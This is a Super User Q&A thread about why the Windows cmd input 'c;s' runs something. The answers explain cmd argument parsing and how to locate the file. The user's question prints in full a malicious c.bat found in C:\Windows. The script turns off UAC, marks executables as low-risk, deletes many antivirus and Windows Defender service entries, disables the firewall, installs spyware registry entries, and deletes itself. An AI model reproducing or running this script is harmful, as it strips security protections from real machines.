# what do windows command prompt c;s command mean?

Tags: windows-10, cmd.exe

It seems `c;s` is an operable command that returns some pretty weird results [below]; is this something I need to worry about, as I have no clue about this command and couldn't find any solution on Superuser: 
 [image: Screenshot of the text]

- I found the below script [`%WinDir%\c.bat`] and believe it is some sort of program meant to infect my system, likely some program installed `apriori` or by my mistake, as there are some issues with my system I assume is because of this (e.g. settings saying *Managed by Organization* and some registry keys not working at times), even though Symantec and Malwarebytes Antivirus detected nothing:

  ```bat
  @echo off

  set "osX=%PROCESSOR_ARCHITECTURE%"

  if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
  if "%osX%"=="x86" (
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"        /v "EnableLUA"                  /t REG_DWORD  /d "00000000" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"        /v "ConsentPromptBehaviorAdmin" /t REG_DWORD  /d "00000000" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"        /v "PromptOnSecureDesktop"      /t REG_DWORD  /d "00000000" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"        /v "ConsentPromptBehaviorUser"  /t REG_DWORD  /d "00000000" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations"  /v "DefaultFileTypeRisk"        /t REG_DWORD  /d "24914"    /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations"  /v "LowRiskFileTypes"           /t REG_SZ     /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments"   /v "HideZoneInfoOnProperties"   /t REG_DWORD  /d "1"  /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments"   /v "SaveZoneInformation"        /t REG_DWORD  /d "2"  /f

    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}"         /v "DisplayName"      /t REG_SZ   /d "RelevantKnowledge" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}"         /v "UninstallString"  /t REG_SZ   /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "HK_Path"          /t REG_SZ   /d "%windir%\system32\rlls.dll"   /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "HK64_Path"        /t REG_SZ   /d "%windir%\system32\rlls64.dll" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "LD64_Path"        /t REG_SZ   /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "KS_Path"          /t REG_SZ   /d "%ProgramFiles%\RelevantKnowledge\rlls.dll"      /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "SV_Path"          /t REG_SZ   /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f

    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy"           /v ""             /t REG_SZ /d "" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings"  /v "RunLine"      /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings"  /v "ServiceName"  /t REG_SZ /d "RelevantKnowledge" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings"  /v "UninstURL"    /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings"  /v "RevertPath"   /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f

    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
    Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
  ) else (
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"        /v "EnableLUA"                  /t REG_DWORD  /d "00000000" /f  /reg:64
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"        /v "ConsentPromptBehaviorAdmin" /t REG_DWORD  /d "00000000" /f  /reg:64
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"        /v "PromptOnSecureDesktop"      /t REG_DWORD  /d "00000000" /f  /reg:64
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"        /v "ConsentPromptBehaviorUser"  /t REG_DWORD  /d "00000000" /f  /reg:64
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations"  /v "DefaultFileTypeRisk"        /t REG_DWORD  /d "24914"    /f  /reg:64
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations"  /v "LowRiskFileTypes"           /t REG_SZ     /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f  /reg:64
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments"   /v "HideZoneInfoOnProperties"   /t REG_DWORD  /d "1"  /f  /reg:64
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments"   /v "SaveZoneInformation"        /t REG_DWORD  /d "2"  /f  /reg:64

    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}"         /v "DisplayName"      /t REG_SZ /d "RelevantKnowledge" /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}"         /v "UninstallString"  /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "HK_Path"          /t REG_SZ /d "%windir%\system32\rlls.dll"   /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "HK64_Path"        /t REG_SZ /d "%windir%\system32\rlls64.dll" /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "LD64_Path"        /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe"  /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "KS_Path"          /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll"       /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config"  /v "SV_Path"          /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe"  /f  /reg:32

    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy"           /v ""             /t REG_SZ /d "" /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings"  /v "RunLine"      /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings"  /v "ServiceName"  /t REG_SZ /d "RelevantKnowledge" /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings"  /v "UninstURL"    /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f  /reg:32
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings"  /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f  /reg:32

    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray"                 /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus"           /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray"                   /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner"         /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI"                      /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security"   /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin"                    /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger"  /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware"           /f  /reg:32
    Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware"           /f  /reg:32
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray"                 /f  /reg:64
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus"           /f  /reg:64
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray"                   /f  /reg:64
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner"         /f  /reg:64
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI"                      /f  /reg:64
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security"   /f  /reg:64
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin"                    /f  /reg:64
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger"  /f  /reg:64
    Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware"           /f  /reg:64
    Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware"           /f  /reg:64
  )

  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE4.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE3.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP20.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP19.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MsMpSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /f

  Reg Add "HKLM\SYSTEM\CurrentControlSet\services\ekrn"         /v "Start"      /t REG_DWORD  /d "4" /f
  Reg Add "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess" /v "Start"      /t REG_DWORD  /d "00000004" /f
  Reg Add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc"       /v "Start"      /t REG_DWORD  /d "00000004" /f
  Reg Add "HKLM\SYSTEM\CurrentControlset\Control\Nls\Language"  /v "Default"    /t REG_SZ     /d "0407" /f
  Reg Add "HKLM\SYSTEM\CurrentControlset\Control\Nls\Locale"    /v "(Default)"  /t REG_SZ     /d "00000407" /f

  bcdedit /deletevalue "{current}" safeboot

  regedit /s %windir%\d.reg
  regedit /s %windir%\ct.reg

  del %windir%\Set-up.exe
  del %windir%\ct.reg
  del %windir%\d.reg
  del %windir%\b.bat

  shutdown /r /f /t 10

  del %0
  ```

Comment: @davidpostill I was writing an answer. The command c;s is not a native cmd command, so it must be a batch script on their computer. given that c;s is interpret as c s, there must be a c.bat file somewhere, or c.exe

Comment: Reopened so you can answer. It had better be a good one! :)

Comment: Doesn't do anything on my machine... I'd assume that "c" was a script or program on your computer and ";" would be a separator to run another command. So you would be running programs `c` and `s`. Do you have mingw or a c compiler installed?

Comment: Same here. Not a command on any of my Windows machines here Seven through Ten.

Comment: Is this _actually_ cmd.exe, or is it something else like PowerShell or WSL or Git Bash? And if it's really cmd.exe what do you get from both `where c` and `where c;s`?

Comment: compare typing `cls & dir` and `cls ; dir ` at the prompt, repeat it.

Comment: @ItWasn'tMe it's **not** ignored. `;` is an argument separator just like space or tab. In fact [cmd accepts `<space>` `<tab>` `;` `,` `=` `<0x0B>` `<0x0C>` and `<0xFF>` as separators](https://stackoverflow.com/a/4095133/995714) so `c;s` is parsed as `c s` with s being the first argument to c

Comment: @Mokubai `;` is an argument separator in cmd, not a command separator so `c;s` will run only 1 command named c with an argument called s

Comment: @DavidPostill Thanks for reopening. I was gone off to bed by the time this happened though, but the given answer basically says what I would've said, so I'm not going to post a similar answer.

Comment: It actually seems it is a batch file in C:\Windows folder. I believe it's some malicious program. I have kept a backup in case something breaks, but have deleted it from the folder. Majorly because it seems to delete some pretty important registry files. I have attached the contents of the file c.bat in the question. Please let me know if it is something to worry about. Thank you @LPChip

Comment: You need to find and delete this files `d.reg, ct.reg, Set-up.exe, ct.reg, d.reg, b.bat` in `c:\windows` folder, and maybe **[more..](https://vms.drweb.com/virus/?i=18422149&lng=en)**

Answer (score 3, accepted):

Do you have a `c` file located in the current folder, or in a folder defined in **`%PATH%`**, with an extension defined in **`PATHEXT`**:

```bat
echo=%PATHEXT%
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW;.BATCH
```

- As suggested by [@user1686](https://superuser.com/users/1686/user1686), you can try to find your file and take a look at the content:

  ```bat
  for /f tokens^=* %i in ('%__AppDir%where.exe c')do @echo\File Path: %~fi & type "%~i"
  ```
- `;s` is ignored for some commands that do not handle/receive arguments like:

  ```bat
  pause;s 
  cls;s
  ```

  > *As commented by [phuclv](https://superuser.com/users/241386/phuclv), it's not ignored, as **`;`** is an argument separator just like space or tab, so `c;s` is parsed as `c`:*
  >
  > - *[cmd separators](https://stackoverflow.com/a/4095133/995714): `<space>`, `<tab>`, `;`, `,`, `=`, `<0x0B>`, `<0x0C>`, and `<0xFF>`*
  > - ***`;`** is an argument separator in cmd, not a command separator, so `c;s` will run only one command named `c` with an argument called `s`*
- If these suggestions do not work, verify if you have any macro(s) in use:

  ```bat
  doskey /MACROS:ALL
  Reg Query "HKLM\Software\Microsoft\Command Processor" | find /i "AutoRun"
  Reg Query "HKCU\SOFTWARE\Microsoft\Command Processor" | find /i "AutoRun"
  ```

---

**Additional resources:**

- [`Where`](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/where)
- [`For /?`](https://ss64.com/nt/for.html)
- [`For /F`](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/for)
- [`Findstr`](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/findstr)
- [`Doskey`](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/doskey)
- [`Reg Query`](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-query)
- [Redirection](https://www.robvanderwoude.com/redirection.php)

  - `|`, `<`, `>`, `2>`, etc.
- Variables:

  - [`%PATH%`](https://ss64.com/nt/path.html) | [`%PATHEXT%`](https://ss64.com/nt/path.html)
  - [Environment](https://ss64.com/nt/syntax-variables.html)
- [How does the Windows Command Interpreter [`cmd.exe`] Parse Scripts](https://stackoverflow.com/q/4094699/6819406)

Comment: I went through the instructions and found the file. C:\Windows\c.bat. Seems something malicious. I have deleted it from the folder, but kept a backup. I have attached the file contents in the question. Please let me know if you think it is something worrisome. Thanks for the help

Comment: @AniruddhAnna Thank for your actions, when I’m in my place I’ll edit and see some possible suggestion.

Comment: @JW0914 pure good edition! Thanks